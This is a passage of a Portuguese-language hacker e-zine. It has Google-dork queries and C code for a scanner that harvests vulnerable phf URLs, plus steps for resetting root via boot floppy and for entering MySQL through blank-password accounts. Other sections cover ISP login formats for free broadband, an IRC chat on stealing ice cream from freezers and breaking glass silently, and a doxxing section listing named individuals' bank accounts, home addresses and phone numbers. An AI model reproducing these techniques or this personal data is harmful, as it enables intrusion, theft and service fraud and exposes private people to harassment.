documentos importantes, etc. Claro para encontra algo valioso voce gastara algum tempo fazendo buscas e filtrando os resultados. Explicacao de comandos: "site:" faz uma busca dentro de um dominio. ex.: "big brother site:globo.com" vai listar todas as paginas no dominio globo.com que contem "big brother". "allintitle:" faz uma busca por paginas que contem palavras especificas no titulo. ex.: "allintitle:seja bem vindo" busca todas as paginas com titulo contendo as seguintes palavras "seja bem vindo". "allinurl:" faz uma busca por enderecos de url que contem palavras especificas. ex.: "allinurl:contato.asp" busca todos os sites contendo "contato.asp" na url. Para mais comandos, basta acessar e ler o help do google.com Exemplos de uso como ferramenta hacking: "allinurl:usuarios.mdb site:.com.br" busca por arquivos de banco de dados nomeados "usuarios.mdb" dentro do dominio mae ".com.br" "allintitle:admin panel site:.org" busca por supostas paginas de administracao dentro do dominio ".org" "allinurl:login.asp" lista todas as paginas com nome de "login.asp", e em alguns casos o google exibira uma versao "cache" da pagina onde sera possivel ver o codigo asp. Bom, quem ja me conhece, sabe que sou pessimo para escrever artigos e explicacoes. Mas acredito que se voce realmente tem potencial para estar na area de seguranca, voce eh capaz de entender a ideia principal deste artigo e aprimora-la. Abracos, Hunter <++> gscan/gscan.c /* Gooooooooooooooogle host scan v0.1 * by Cheat Struck * * Make a hostlist with google help. * * $ gcc gscan.c -ogscan * $ ./gscan .com.jp 10 1 > hosts.japan * $ ./gscan .com.jp 10 2 >> hosts.japan * $ ./gscan phf > hack.phf.urls * */ #define GOOGLE "www.google.com" #include #include #include #include #include #include #define n4rfy(s,str) write(s,str,strlen(str)) #define struck(s,str) read(s,str,sizeof(str)) char *extract_host(char *in); int http_connect(char *host); int main(int argc, char *argv[]) { int s0ck, i, j, start=0, pages=10; char query[500], str[1000000], *p, *aux; if ( argc < 2 ) { printf("Goooooooooooooogle Host Scan....\n\n"); printf("use: %s [pages] [first_page]\n",argv[0]); printf("sample: %s \".com.br\"\n",argv[0]); exit(-1); } if (strlen(argv[1]) > 400) { fprintf(stderr,"Help IDS!! He try exploit-me!!!\n"); exit(-1); } if (argc >= 3) pages=atoi(argv[2]); if (argc >= 4) start=atoi(argv[3]); for(j=0; j < pages; j++) { if ( (s0ck=http_connect(GOOGLE)) == -1) { fprintf(stderr,"U0ps: can't connect to google!!\n"); exit(-1); } //Just for tests... //s0ck=open("./google.html",O_RDONLY); // sprintf(query,"GET /search?q=site:%s&start=%d0\n\n",argv[1],start+j); sprintf(query,"GET /search?q=inurl:%s&start=%d0\n\n",argv[1],start+j); // puts(query); n4rfy(s0ck, query); // n4rfy(s0ck,"HEAD / HTTP/1.1\n\n"); // n4rfy(s0ck,"GET /search?q=inurl:/cgi-bin/phf\n\n"); // n4rfy(s0ck,"GET /search?q=inurl%3A%2Fcgi-bin%2Fphf\n\n"); /* http://www.google.com.br/search?q=inurl%3A%2Fcgi-bin%2Fphf http://www.google.com.br/search?q=inurl:/cgi-bin/phf */ do { if ( (i=struck(s0ck,str)) == -1) { fprintf(stderr,"U0ps: can't read from google!!\n"); exit(-1); } str[i]='\0'; aux=p=str; while ( (p=strstr(p,"") == NULL); close(s0ck); } return 1; } char *extract_host(char *in) { char *p, *aux; p=in; if (strncmp(p,"http://",7)) return NULL; p+=7; if ( (aux=strchr(p,'/')) != NULL) *aux='\0'; return p; } int http_connect(char *host) { struct hostent *he; struct sockaddr_in s_in; int sock; if ( (he = gethostbyname(host)) == NULL) { fprintf(stderr,"err0: gethostbyname() fails!\n"); return -1; } memset (&s_in, 0, sizeof(s_in)); s_in.sin_family = AF_INET; s_in.sin_port = htons(80); memcpy(&s_in.sin_addr.s_addr, he->h_addr, he->h_length); if ( (sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { fprintf(stderr,"err0: socket() fails!\n"); return -1; } if (connect(sock, (const struct sockaddr *) &s_in, sizeof(s_in)) == -1) { fprintf(stderr,"err0: connect() fails!\n"); return -1; } return sock; } <--> _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ ___._____ _________ ______________________________________ __________by _liquid _____________08. Hacker Power Elite Zine 1.0 _________________________________ ______________ _____.___ _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ / =- * Hacker Power Elite Zine 1.0 \ =- Topicos: 1. Introducao 2. Estilo 3. Etica hacka 4. Invasao 5. Links 6. Emails 7. Palavras finais _______________ / \ / Introducao \ \_________________/ Oi galera, bem vindos à minha e-zine hacker, a mais nova a estrear no mundo underground hacker elite. Apesar de estar apenas comecando, a zine já está bem elite, com bastante coisas interessantes. Mas como eu sou hacker elite underground power eu sei que ninguem lê introdução, entao vamos ao que interessa. _______________ / \ / Estilo \ \_________________/ Essa e-zine tem um estilo bem proprio, e bem hacker. Ela foi criada por mim sem ajuda de ninguem e se alguem disser que eu copiei alguma coisa é mentira e quem falou é um lammer que nao sabe nem invadir por IP. Essa e-zine hacker leet underground é muito maneira e tem muitas coisas. Mas todos nos hackers elites undergrounds powers sabemos que ninguem lê essas merdas, entao vamos ao que interessa. _______________ / \ / Etica hacka \ \_________________/ Pois é turma aqui vou falar sobre um assunto muito polemico na atualidade atual do nosso mundo contemporaneo globalizado: a etica dos hacker, os piratas de computador. Esse episodio que eu vou comentar aqui logo em baixo é um assunto atual muito atualizado na atualidade atual do nosso mundo contemporaneo globalizado do seculo 21. Esses dias um cara muito hacker e muito respeitado na comunidade hacker elite underground power super duper foi pego enganando todos seus colegas, por um motivo muito malvado: dinheiro. O nome desse individuo é Jose Augusto Fernandes. Ele disse que criou um sistema operacional de computadores de arquitetura intel x86 chamado SBOX, que seria escrito com kernel proprio, aplicacoes proprios e sistema de arquivos proprios. Um plano muito bem bolado, que envolveu desde calote na padoca do seu manuel até alteracao de dados confidenciais ultra secretos do servico secreto internacional. Mas nossos hackers investigadores nao deixaram por menos, invadiram o suposto sbox e descobriram a farsa. É claro que nao foi facil, nossos hackers tiveram que usar programas ineditos nunca feitos em toda a historia da humanidade. Programas usados pelos nossos hackers underground elite power super duper investigadores: The Matrix Password Breaker by agent_smith Kernel Loader by mr_anderson a.k.a. neo Galinha Preta Connection Spoofer by _liquid DanOS IDS by pchazard High-tech Mandinga Dissas Tool by struck Vamos lá: localhost# export MATRIX="exec /bin/matrix" localhost# telnet sbox.com.br Welcome to the hackerer OS in the world. Login: root Password: MATRIX 34768236 O8685452 45342347 98753187 78445168 34356456 35168445 87986411 78654156 64651656 87465466 89745646 89746656 56764165 58746564 98746546 68464556 65464566 32132313 98798798 79874563 23153768 68465133 87864351 68435167 68451354 6463X155 89464646 65432135 65435135 97546576 98768468 68764687 68761684 86768468 98668767 68713543 68768436 68764676 18978453 87975431 58798137 43213748 97321987 98721321 Code cyphered. Password was: 123 Using password. Login: root Password: Welcome to sbox! % lsmod Modules: fuck root off root hack0 root IDS root backd0r root % rmmod IDS % wget localhost/kernel.tar.gz % tar -zxvf kernel.tar.gz % cd kernel % ./kernel --tracemodule backd0r Module traced: /tmp/.backd0r % namp localhost Open 23/tcp telnet Open 12345/tcp NetBus % telnet sbox.com.br 12345 Your IP is not accepted by this backdoor. % wget localhost/mandinga.tar.gz; tar -zxvf mandinga.tar.gz; cd mandinga % ./mandinga tmp/.backd0r Dissassembling to .c: #include #include int main() { receiveconection(); execl("/bin/bash","/bin/bash"); } int receiveconection() { if (ip!=narfy.com.br) printf("Your IP is not accepted by this backdoor."); } % wget localhost/galinhapreta.tar.gz; tar -zxvf galinhapreta.tar.gz; cd galinha % ./galinha --fake=narfy.com.br --exec=telnet sbox.com.br 12345 bash2.05$ echo "we are elite hackers" >> /etc/motd _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ ___._____ _________ ______________________________________ __________by ZaNnDoN _____________09. Manual definitivo de como roba sorvete da kib0n _________________________________ ______________ _____.___ _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ Caralho! Esse eh muito antigo mas inda ta valendo. =) descobri as manha de tira akelas trava dos frezer da kibom kra.. agora na escola todo dia ta rolando sorvete na faixa ZaNnDoN, haehhah h0h0h0 q trava kra? phrik0 huuhuh ta ligado akelas trava q tem? nakeles freezer de vidro? nem todos tem .. soh os q ficaum espostos.. nop.. sigh, nunca viu? * sigh ouvindo pennywise - waste of time sigh, ta ligado qual freezer eh neh? akeles xei de plakinha em cima hheh veio sorvete na faixa cool auhuhau hoje chega mais.. vaum repor os sorvetes.. nao tinah akele q parece com o tropo.. chega amnaha.. h0h0h0 heheheh eh das criancinha os vevete pow =/ ensina o truque p/ garotada ae... ahah eh escroto cara.. soh vc puxa a trava pra baixo .. ai vc tira o vidro do freezer pelo canto .. ai c consegue empurra a trava pra dentro .. dai pega o q c qr e poe a trava e o vidro devolta =) "manual definitivo de como roba sorvete da kib0n" by ZaNnDoN aahah auhuahuh hauiheiheahuiah veio eh muito loco .. imagina.. qnts sorvete c quizeh .. na faixa.. =) agora to ligado qual o freezer *** thasmx (~fuckn@WetjjktkmMs.dialdata.com.br) has joined #r00t tava pensando nakele deitado aee struck` ae descobri qual era o prob. aqui ae zando se a kib0n te pegar.. Soh tem q cuidar pra ver se nao aparece o padeiro e te ve burlando o freezer dele... ta numa fria cara hhehe aham.. hehehe negoco eh axar um bixo dese sem ninguem por perto ai eu taco eh a tijolada logo ehheheheh bem + facil ahahah mais tipo .. c vc taca o tijolo os kra veem .. essa eh rapidao cara.. peguei pratica.. ahhua eu chego puxo do um toque na trinca.. e ta aberto .. ai pego os sorvete q eu quero .. enfio no bolso.. pego a trinca.. e ponho .. kra =) se o vei acorda eu to f u d i d o sigh pq? *** REIHACKERROMMOR (HACKERMOR@lPdfxlC5Vpg.200.239.122.O) has joined #r00t *** REIHACKERROMMOR was kicked by ZaNnDoN (sem comentarios) *** ZaNnDoN sets mode: +b *!*@lPdfxlC5Vpg.200.239.122.O sigh : eu tbm... se minha veia ou meu padastro acordam me matam... zando o porteiro aki do predio eh moh bate carteira ah caraio .. desisto de instala esse bnc nessa merda de shell.. ele me ensino umas parada suggarface, tipo o q? vamu faze um manual do ladrao (dias de hoje) =) pra tu "trinka" qq vidro,espelho e tal.sem fazer barulho ou kebrar mesmo tu usa um pedacinho..tipo o poh..da vela de carro qdo ta kente * sigh is away, coding uma parada, perai q as ideias tao fluindo ... (l/p) eh soh tacar em cima do vidro ele trinca hm .. preciso testa isso auhaa ele usa pra roba toka-fita =] eh serio hehehe nao epalhem ok se nao a carreira dele acabou hehhe kra.. as picole eh eskema.. nao espalha senao a kibon cria um sistema de seguranca melhor ahuhaua _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ ___._____ _________ ______________________________________ __________by Cheat Struck _____________10. Receita de bolo: Como obter root local em poucos segundos... _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ _________________________________ ______________ _____.___ struk@bule:~$ wget ftp://ftp.slackwarebrasil.org/pub/linux/slackware/slackware-10.1/bootdi sks/bare.i --11:40:48-- ftp://ftp.slackwarebrasil.org/pub/linux/slackware/slackware-10.1/bootdisks/ bare.i => `bare.i' Resolving ftp.slackwarebrasil.org... 200.20.10.18 Connecting to ftp.slackwarebrasil.org[200.20.10.18]:21... connected. Logging in as anonymous ... Logged in! ==> SYST ... done. ==> PWD ... done. ==> TYPE I ... done. ==> CWD /pub/linux/slackware/slackware-10.1/bootdisks ... done. ==> PORT ... done. ==> RETR bare.i ... done. Length: 1,474,560 (unauthoritative) 100%[=============================================>] 1,474,560 31.84K/s ETA 00:00 11:41:45 (31.93 KB/s) - `bare.i' saved [1474560] struk@bule:~$ cat bare.i > /dev/fd0 struk@bule:~$ reboot .... Login: root Linux 2.4.29. # fdisk /dev/hda The number of cylinders for this disk is set to 9729. There is nothing wrong with that, but this is larger than 1024, and could in certain setups cause problems with: 1) software that runs at boot time (e.g., old versions of LILO) 2) booting and partitioning software from other OSs (e.g., DOS FDISK, OS/2 FDISK) Command (m for help): p Disk /dev/hda: 80.0 GB, 80026361856 bytes 255 heads, 63 sectors/track, 9729 cylinders Units = cylinders of 16065 * 512 = 8225280 bytes Device Boot Start End Blocks Id System /dev/hda1 1 4864 39070048+ 7 HPFS/NTFS /dev/hda2 * 4865 9602 38057985 83 Linux /dev/hda3 9603 9729 1020127+ 82 Linux swap Command (m for help): q # mount /dev/hda2 /mnt # cd /mnt # chroot /mnt # passwd Changing password for root Enter the new password (minimum of 5, maximum of 127 characters) Please use a combination of upper and lower case letters and numbers. New password: Re-enter new password: Password changed. # Ctrl+Alt+Del e Tire o diskete.... Pronto! Logue como root usando sua nova senha... _____________ ___________________ ________________________ [Funny QUOTes] ei caras, me respondam uma coisa, se eu instlar o debian em uma partição do hd e se um dia eu o desistalar eu irei ter problemar com a inicialização do windows, tipo, terei de reinstalar o win? obvio! vai ter q formata todo o hd e reinstalar tudo!!! uma vez o debian instalado vc vai ter q aprender a conviver com ele pro resto da vida!!! _____________ ___________________ ________________________ _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ ___._____ _________ ______________________________________ __________by Cheat Struck _____________11. Banda Larga sem provedor... _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ _________________________________ ______________ _____.___ Se voce ainda eh um tosco que paga por um provedor de adsl ou de cable... Voce nunca estranhou pq alem do servico de banda larga ainda tinha que pagar um provedor para ganhar emails, hospedagens, essas coisas que facilmente se consegue de graca na internet? Bem... acesse www.abusar.org.br para maiores informacoes. 1o Caso - Cable Modem ===================== Para internet a cabo (virtua, ...) nao ha necessidade de um provedor pq nao eh preciso autenticar a conexco. O modem fornecido pela NET (ou ...) ja faz tudo sozinho... Um provedor de cable q nao serve para nada de mais, custa em torno de R$ 10,00 a R$20,00 por mes. O indiada ladrona!!! 2o Caso - ADSL - Planos Residenciais ==================================== - Se seu modem eh do tipo Bridge, voce precisa que uma maquina faca a conexao atraves dele. Para isso eh necesario user/pass para entrar na rede. Neste caso, sua maquina passa a ser o Gateway para a internet (caso voce possua uma rede interna). - Caso seu modem seje router, tambem eh preciso de um user/pass que deve ser configurado no modem. Ele faz a discagem e o computador, ou computadores, ligados a ele serao como pontos de uma rede, sendo o modem o roteador e Gateway para a internet. Ambos os casos, o acesso a internet eh feito por PPPoE e eh necessario uma conta. Solugues: ***** Em alguns estados do Brasil, a Brasil Telecom libera contas de acesso aos seus usuarios. Eles apenas nao sao informados dela. A conta eh a seguinte: User: DDD+Numero_do_telefone@turbobrt Pass: 6 primeiros digitos do cpf / cnpj do responsavel pela linha. Ex: user : 5133813402@turbobrt pass : 045561 ***** Em algumas partes do Brasil ainda nao eh possivel fazer essa autenticacao. Aki em POA-RS nao teve jeito de funcionar... mas ja ouvi pessoal de outros estados dizerem q funfa blza. Entao... Tem mais 2 saidas: "O GigaFree da acesso imediato ` internet, por dial-up 56k, LIGAGCO LOCAL DE TELEFONE, sem qualquer custo de inscrigco ou adesco, em 9 estados e 137 cidades do Brasil." http://www.gigafree.com.br Esqueca a parte q fala que eh apenas para acesso dial-up. Cadastre-se, coloque o user/pass no seu discador ou modem e pah! Funfa! ***** A ultima alternativa, eh ligar para sua operadora e pedir para falar com o suporte tecnico. Peca para eles uma "matricula de teste". Se perguntarem para que, seje criativo: "Meu provedor cortou meu acesso por falta de pagamento e tenho que me conectar para retirar o boleto" "Pq ja faz seculos que pedi para intalarem isso e nao vou pagar um provedor sem saber se esta funcionando" etc... Eles nem encrencam mto... soh querem se livrar do cliente o qto antes. Acho q o custo de um plano residencial ADSL ta em torno de R$ 15,00. Entao ja eh uma economia todo o mes. 3o Caso - ADSL - Planos Empresariais ==================================== Neste caso a economia eh bem maior. A ilusao de que eh necessario um provedor para as empresas que tem acesso com IP Fixo eh o que mais toma dinheiro do pobre e pequenino empresario. Para se ter uma ideia. Coloquei um servico Turbo 800k e o valor de um provedor para este servico tava em torno de R$100,00!!! Bahh!! - Caso voce tenha um modem Bridge. Nao serve. Voce precisa de um modem Router. - Os modens roteadores sempre tem um acesso a interface do modem. Eh como se fosse uma outra maquina na sua rede. Voce acessa-o por http, ftp ou telnet ou ainda um servico proprio do modem. O importante eh que voce tem acesso a ele e as configuracoes sao feitas nele e nao na sua maquina. - Quem conecta tambem eh o proprio modem. Mas eh preciso alterar algumas coisitas nas configuracoes dele. Como por exemplo... VPI e VCI (Deve ser informado pelo suporte da operadora que fornece o servico). A grande diferenca aki eh que o tipo de conexao eh PPPoA e nao mais PPPoE. ***** As contas que funcionavam anteriormente nao funfam aki. O que precisa aqui eh uma senha CROS. O formato dela eh assim: user: CROS754441864 pass: DDD+Numero_do_telefone Cada linha possui seu usuario que deve ser informado pelo suporte da Brasil Telecom. ===================== Os exemplos mostrados aki foram testados usando o servico da Brasil Telecom e NET. Cable modem - Virtua 150k; ADSL Residencial - Turbo 300k; ADSL Empresarial - Turbo 800k; _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ ___._____ _________ ______________________________________ __________by Cheat Struck _____________12. Acessando bancos mysql sem conta.... _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ _________________________________ ______________ _____.___ Funfa para bancos de dados recem instalados e mal administrados. mysql@bule:~$ mysql -p -u '' Enter password: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 4 to server version: 4.0.23a Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> No password nao digite nada... apenas de enter. Pow! Pois eh.. funciona... para deletar esta e outras contas sem senha faga: mysql@bule:~$ mysql -p -u root Enter password: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 6 to server version: 4.0.23a Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> use mysql Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> select user, password from user where password = ''; +------+----------+ | user | password | +------+----------+ | root | | | | | | | | +------+----------+ 3 rows in set (0.00 sec) mysql> delete from user where password = ''; Query OK, 3 rows affected (0.00 sec) mysql> flush privileges; Query OK, 0 rows affected (0.00 sec) mysql> exit Bye _____________ ___________________ ________________________ [Funny QUOTEs] *** Now talking in #phreak ei, alguem aqui sabe como roubar um nick? heheheh ja cheguei ouvindo merda é claro que da! hahahah _____________ ___________________ ________________________ _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ ___._____ _________ ______________________________________ __________by Cheat Struck _____________13. Gerador de numeros de cartoes para cells pre-pagos _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ _________________________________ ______________ _____.___ Incrimveis programas que gerao numeros de cartoes para telefones celular pre-pagos. Confira abaixo como adquiri-los. ---- [ nOTA DO STRUCK: Postado no forum da Terra http://www.terra.com.br ] Tmtulo: PARE DE PAGAR CELULAR Data: 24 Apr 2005 02:02:15 -0300 De: Grupo: estilodevida.mulher.voce_namoraria_um_metrossexual SEJA INTELIGENTE!!!!!!!! NAO PAGUE MAIS CELULAR PRE-PAGO!!!!!!!!! DEPOIS QUE CONSEGUI ESSE PROGRAMA, ADEUS CARTAO DE CELULAR VOCE PODERA COLOCAR ATE R$150,00 (CENTO E CINQUENTA REAIS) POR SEMANA DE CREDITO!!!!! ISSO MESMO!!! POR APENAS R$10,00 (DEZ REAIS) VC NAo PRECISARA COMPRAR MAIS CARTAO PARA SEU CELULAR, E DEPOIS, PODERA VENDER ESSE MESMO PROGRAMA PELO PRECO QUE QUIZER!!! GRUPO DE HACKERS QUE TRABALHAM NA OPERADORA VIVO, ACABAM DE CRIAR SISTEMA QUE GERA NUMEROS DE CARToES PRE-PAGOS (CREDITOS CELULAR). CONFIRA!!! COLOQUE SALDO, DE GRAGA (SEM GASTAR NADA), NO SEU CELULAR PRE-PAGO!!! COLOQUE ATE R$ 150,00 DE SALDO, POR SEMANA. VALE PRA PRA TODAS OPERADORAS (Claro, Vivo, Tim, Oi, Bcp, Atl, Tess, Vesper, TeleBahia, Amaztnia, etc). RODA EM QUALQUER COMPUTADOR E QUALQUER APARELHO!!! NAO PERCA TEMPO E NEM DINHEIRO COMPRE AGORA MESMO O SEU GERADOR POR APENAS 10,00 DEZ REAIS!!! DADOS PARA DEPOSITO: BANCO DO BRASIL AGJNCIA: 3124-0 CONTA POUPANGA: 8.833-1 VARIAGCO: 1 DOGLAS DIAS PAES E ME ENVIE O COMPROVANTE NESTE E-MAIL doglasjoplin@ig.com.br PARA TE ENVIAR O PRODUTO ASSIM QUE CONFIRMADO O PAGAMENTO RECEBERA LOGO EM SEGUIDA O GERADOR NO E-MAIL QUE PREFERIR Doglasjoplin@ig.com.br MENSAGEM DE QUEM JA COMPROU: Beatriz de Souza - Salvador - BA "Comprei esse gerador de credito e nco me arrependo, agora posso ligar para todo o Brasil, obrigado Doglas" Ana Furtado - Cachoerinha - RS "Funciona mesmo Doglas, coloco R$ 100 , 00 (Cem reais) por semana" Zila Teixeira - Cascavel - PR "Nco entendo como descobriram isso, agora vendo criditos para meus vizinhos" Armando Castro - Natal - RN "Trabalho e utilizo muito o celular, gastava em torno de R$ 150 , 00 (Cento e cinq|enta reais)por mjs, eh um dinheiro que economizo" Obrigado ao pessoal que enviaram comentarios para meu e-mail, falei que o p ---- [ nOTA DO STRUCK: Postado no http://www.agirazul.com.br/ ] GERADOR CRIEDITO E DESBLOQUEADOR NOKIA De: JOAO Brasil VENDO DOIS GERADORES DE CRIDITO (GERALINE E ULTRACELLGEN) QUE NA INTERNET SCO VENDIDOS POR 25,00 EM MIDIA. SEM ENROLAGCO, COMIGO SS FUNCIONOU UMA VEZ, SERVE PARA TIM, CLARO, VIVO, OI, BRTCELL. O DESBLOQUEADOR FUNCIONA PERFEITAMENTE, SOMENTE APARELHOS QUE NCO SEJAM TELA COLORIDA, E MODELOS NOKIA. PASSO OS 3 PROGRAMAS POR 4,00 DEPOSITADOS EM C/C. AG: 0149 C/C 01117-3 ITAU ME MANDE EMAIL: j.sevan@gmail.com AO CONFIRMAR INTERESSE ME ENVIAR UM ENDEREGO DE EMAIL QUE ACEITE ARQUIVOS .EXE (QUE SCO AS EXTENSUES DOS PROGRAMAS). ENVIAR UM ENDEREGO DE EMAIL QUE CAIBA 1,5 MB. ---- [ nOTA DO STRUCK: Postado no http://forum.abril.com.br/info ] Enviado por: raflesh em 31/05/2004 amigo o ultracelgen nao funciona eu tenho o CelGen caros amigos que se interessam por um gerador que realmente funcione o gerador custa apenas 5,00 reais dados para pagamento banco do brasil conta corrente 12237-8 agencia 3381-2 RAFAEL FANTE DE FREITAS FARIA assim que fizer o pagamento favor me enviar um e-mail para confirmagco assim eu lhe enviarei o programa no e-mail que desejar. raflesh@pop.com.br raflesh ---- [ nOTA DO STRUCK: Postado no http://inforum.insite.com.br ] De: Anonimous IP: 200.165.86.1- Assunto: As mentiras dos geradore de credito para celular Quero explicar q essa historia de gerador de credito para celulares nao existe, vou explicar para vcs como funciona o sistema de telefonia cell pre pago,quando compramos um cartao para recarregar nossos creditos,o numero que vem com o cartao que compramos ja existe,ele ja e pre estabelecido pela operadora,quando ligamos para operadora e digitamos o numero contido no cartao esse numero simplismente e liberado,liberando os creditos referente a numeragao do cartao,isso derruba totalmente os geradores de creditos contidos no mercado com por exemplo o Gerante, ultragen ou o famoso geraline dentre outros,esses programas geram numeros que de nada serve. bem so existe um programa que realmente funciona mas nao e um gerador de credito, ele Re-valida cartoes que vc ja usou no seu celular infinitamente,esse programinha foi citado por kris kimisakov mas por nome de Nemesys o que ja nao e mas esse nome, hoje ele e chamado de ONYX e foi desenvolvido por phreakers americanos e sua licensa e bastante cara custa cerca de U$ 450,00 dolares,dois pontos muinto forte a ser dito sobre o ONYX e que e indispensavel o uso de cabo de dados o celular deve esta conectado diretamente ao computador para conseguir revalidar seus creditos, outro ponto importante e sobre a configuragao do programa o usuario deve configurar o software,Syslogg um grande e respeitado Cracker e Phreaker de sistemas me enviou uma copia para que eu pudesse analizar o programinha realmente e muinto bom eu tenho o programa mas nao posso vender pois a dona da licensa do produto e a respeitada Securyt System e e vendido somente para menbros,mas se quizer voce pode tentar convencer o Syslogg a vender para voce.entre em comtato com o cara pelo EMAIL:Syslogg@hotmail.com ----- [ nOTA DO STRUCK: Postado no http://inforum.insite.com.br ] [ Se liga no ip do figura e o ip do post anterior ] De: Kris kimisakov IP: 200.165.86.1- Assunto: Re: Credito gratis sou Kris kimisakov programador de sistemas de telefonia celular, caros colegas todos os geradores que estao no mercado nao passa de pega troxa naverdade o que ven sendo dito sao simplismente mentiras so existe um programa que realmente valida credito essse programa trabalha diretamente com um cabo de dados isso significa que o seu celular tem que esta conectado diretamente ao pc o programa foi dezemvolvido por phreakers americanos e i 100% confiavel ourtro ponto inportante que precisa ser dito sobre o programa e que o usuario deve saber configurar o software enfim o programa foi batizado de NEMEZYS para saber maiores informagoes e so vc Mail-me K_999@ig.com.br ---------- Outras contas para deposito para adquirir esses incriveis programas: Banco do Brasil Agjncia: 2480-5 Conta Poupanga: 18394-6 Rodolfo de Freitas Faria BANCO DO BRASIL AGJNCIA: 3381-2 CONTA CORRENTE 12237-8 RAFAEL FANTE DE FREITAS FARIA [ nOTA DO STRUCK: Que familia mais falcatrua!] BANCO DO BRASIL AGJNCIA: 3124-0 CONTA POUPANGA: 8.833-1 VARIAGCO: 1 DOGLAS DIAS PAES BANCO: CAIXA ECONTMICA FEDERAL AGJNCIA: 0142 OPERAGCO: 013 CONTA POUPANGA: 00142281-7 BIANCA MALAQUIAS ALVES Caixa Economica Federal AGJNCIA: 0658 CONTA POUPANGA: 00118667-1 F. G. V. Andrade BANCO: ITAU AG: 0149 C/C: 01117-3 JOCO Outros deixam para dar a conta apenas por email... Para os que cairam (vcs sco burro heim!), ja tentaram denunciar esse pessoal ae? ----------------------- Agora olha q engracado... Eh muito nao ter o que fazer neh... mas pesquisei pelo nome dos falcatrua... E alguns deles ja tentaram ganhar dinheiro com aquelas correntes de enviar R$ 1,00 pelo correio para uma lista de 6 usuarios etc... muitos devem lembrar dessa corrente antiga chamada "Como ganhar dinheiro facil na internet". Mas nestas correntes era necessario colocar um endereco real para receber o dinheiro... Vamos abrir entao o cofre de segredos dos 3 que mais lesaram aos lamers na internet, apenas para os que foram enganados possam no minimo passar trotes e cartas ameacadoras para os espertalhoes. 1o. Rodolfo de Freitas Faria ############################ [Publicado numa antiga corrente onde cada integrante enviava R$ 1,00 para 6 membros da lista...] 1) Andre Luiz Rodrigues Soares - Rua Dr. Raul de Alencar - nB: 712 - Bairro: Barro Vermelho - Natal - RN CEP:59030-560 2) Luciano Gaspar de Souza - Rua Waldemar Luiz Marcos-121. bairro Paraiso- Criciuma-SC - cep 88805-183 3) Edmundo Martins de Oliveira - Rua Chaves faria-303. bairro Sao Cristovao- Rio de Janeiro-RJ - cep 20910-140 4) Marcelo Ramos De Oliveira - Rua Zuza Engraxate, 35 - Bairro: Dona Gregsria -Montes Claros-MG- CEP. 39403-049 5) Isabel Cristina Malagodi de Vasconcellos - Rua 26 de Outubro, 208 Bairro: Jardim Serrano Serra Negra SP CEP 13930-000 *6) Rodolfo de Freitas Faria - Rua: Jorge Tibiriga, nzmero: 2151 apartamento 12 Bairro: Boa Vista, Sco Josi do Rio Preto SP CEP: 15025060 2. RAFAEL FANTE DE FREITAS FARIA ################################ [Postado no forum Kanopus : http://www.kanopus.com.br] Author: Rafael Fante de Freitas Faria Quinta, 23 de Agosto de 2001 - 06:00 pm tenho um bom conhecimento em iffice, windows, montagem e manutengco e inclusive instalagco e configuragues de micro.... meu nome i Rafael Fante de Freitas Faria meu telefone i (0xx65) 266-1549 3. DOGLAS DIAS PAES ################### [ http://www.doglaspunk.brasilflog.com.br] Sobre Doglas Punk (www.doglaspunk.brasilflog.com.br) Nome Doglas Dias Paes Cidade Pelotas/RS Email doglaspunk@ig.com.br Idade 20 anos ICQ 285927788 MSN doglasjoplin@msn.com Ele esta... Casado Mais sobre ele Simplismente Rock'n Roll!!!!! Escute Doors, janis Joplin, Ramones, Clash, Kiss, Led... Seu conceito de musica com certeza vai mudar... pra melhor i claro!!!!!!!!! Ah, BIENVENINDO A RODA PUNK!!!! [Publicado numa antiga corrente onde cada integrante enviava R$ 1,00 para 6 membros da lista...] 1) NG Kwan Fu - Rua: Ceara, 1108, Shopping Boulevard 405, Loja 6 - Pituba - Salvador - Bahia - CEP: 41940-350 *2) Doglas Dias Paes - Rua Epitacio Pessoa, 81 - Pelotas ? RS - CEP: 96045-550 3) Gerferson Gimenes da Silva - Rua General Mitre 50 apt: 404 Bairro 25 de agosto - Duque de Caxias RJ - CEP 25075100 4) Leandro Verdi Neto - Rua Saldanha Marinho 456 apt - 03 Centro - Curitiba ? Parana - CEP 80410-150 5) Paulo Henrique de Albuquerque Sousa - Rua Natal, 1086 ? Henrique Jorge - Fortaleza ? CE - CEP 60526-140 6) Rafael Rodrigues - Rua Rocha Pita , 80 - Jardim Aclimagco - Santo Andri -- SP - CEP 09170-720 --------- Eh... ta bom.. da pra da umas risadas... =7 _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ ___._____ _________ ______________________________________ __________by Cheat Struck _____________14. Super Leet Programs _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ _________________________________ ______________ _____.___ Esse eh um gerador de numbahs pra cells pre-pagos feito por mim mesmo... por isso eu garanto que funfa... Esse eu do total certeza! 100% ateh o momento. Todos que usaram disseram que eh ótimo e que nao gastam mais dinheiro com cartao... Deixo exclusivo aki para vcs... <++> Superprogs/freecell.c /***********************************************88 * * * FREE CELL - GERADOR DE NUMEROS DE CARTOES DE CELL PRE-PAGOS * 